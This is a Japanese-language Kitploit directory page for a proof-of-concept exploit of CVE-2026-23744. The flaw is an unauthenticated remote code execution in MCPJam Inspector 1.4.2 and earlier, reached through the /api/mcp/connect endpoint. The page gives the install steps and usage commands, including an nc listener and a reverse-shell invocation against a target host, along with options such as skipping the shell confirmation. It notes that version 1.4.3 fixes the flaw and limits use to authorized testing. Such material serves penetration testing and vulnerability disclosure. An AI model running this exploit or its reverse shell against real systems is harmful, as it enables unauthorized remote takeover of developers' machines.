Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-23744 — CVE-2026-23744 を対象とし、MCPJam Inspector を標的にした未認証のリモートコード実行の概念実証です。リバースシェルとドライランデバッグのサポートを備えた、/api/mcp/connect エンドポイントを悪用するための細工された MCP serverConfig ペイロードを生成します。 | Kitploit
ツール/GitHubGitHub/ozcanpng/cve-2026-23744
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミングリモートアクセスツール
GitHubozcanpng/cve-2026-23744

CVE-2026-23744

CVE-2026-23744 を対象とし、MCPJam Inspector を標的にした未認証のリモートコード実行の概念実証です。リバースシェルとドライランデバッグのサポートを備えた、/api/mcp/connect エンドポイントを悪用するための細工された MCP serverConfig ペイロードを生成します。

リポジトリを見る
112ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-23744 — MCPJam Inspector の認証不要のリモートコード実行 (RCE)

CVE-2026-23744 の認証不要リモートコード実行 PoC。MCPJam Inspector 1.4.2 以前では、/api/mcp/connect を通じて、攻撃者が制御する MCP サーバーコマンドを認証なしで起動できる機能が公開されています。

許可されたテストおよび研究目的に限ります。自分が所有していない、または明示的なテスト許可を得ていないシステムに対して使用しないでください。


機能

root@kitploit:~
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
  1. 細工された MCP serverConfig ペイロードを構築します。
  2. 認証不要の /api/mcp/connect エンドポイントをターゲットにします。
  3. bash -c を通じて設定されたコマンドを起動します。
  4. 安全なコマンド検証とリバースシェルペイロードをサポートします。
  5. トラフィック送信前にペイロードを検査するためのドライラン/デバッグモードを提供します。

スクリーンショット

リバースシェルのセットアップ

リバースシェルのセットアップ

MCPJam 接続ペイロード

MCPJam 接続ペイロード

シェル受信

シェル受信


セットアップ

root@kitploit:~
git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt

使用方法

安全なコマンドの確認

root@kitploit:~
python3 CVE-2026-23744.py \
  --url http://127.0.0.1:3000 \
  --cmd 'id'

リバースシェル

まずリスナーを起動します:

root@kitploit:~
rlwrap nc -lvnp 4444

次に実行:

root@kitploit:~
python3 CVE-2026-23744.py \
  --url http://127.0.0.1:3000 \
  --reverse-shell \
  --lhost 10.10.16.53 \
  --lport 4444

便利なオプション:

root@kitploit:~
--cmd COMMAND       コマンドを実行(デフォルト: id)
--server-id VALUE   細工した MCP 設定の serverId 値(デフォルト: pwn)
--dry-run           HTTP リクエストを送信せずにペイロードフローを構築
--debug             エンドポイントと JSON ペイロードを表示
--verify-tls        HTTPS 証明書を検証
--timeout SECONDS   HTTP タイムアウト(秒)(デフォルト: 8)
--yes               リバースシェルの確認プロンプトをスキップ

影響を受けるバージョン

製品影響を受けるバージョン必要なアクセス影響
MCPJam Inspector<= 1.4.2なしMCPJam Inspector プロセスユーザーとしてのリモートコマンド実行

この問題は、MCPJam Inspector が 0.0.0.0 でリッスンしている場合に特に顕著で、リモートホストが開発サービスに到達可能になります。


注意事項

  • PoC は JSON ペイロードを /api/mcp/connect に送信します。
  • コマンドは serverConfig.command と serverConfig.args を通じて渡されます。
  • リバースシェルを試みる前に、安全な検証のために --cmd を使用することを推奨します。
  • --dry-run --debug を使用すると、ターゲットに触れずに生成されたリクエストを検査できます。
  • NVD によると、バージョン 1.4.3 に上流のパッチが含まれています。

参考情報

  • NVD — CVE-2026-23744
  • GitHub セキュリティアドバイザリ — GHSA-232v-j27c-5pp6
  • パッチコミット
  • MCPJam Inspector

PoC 作成者

ozcanpng — github.com/ozcanpng — ozcanpng.dev

ツールをダウンロード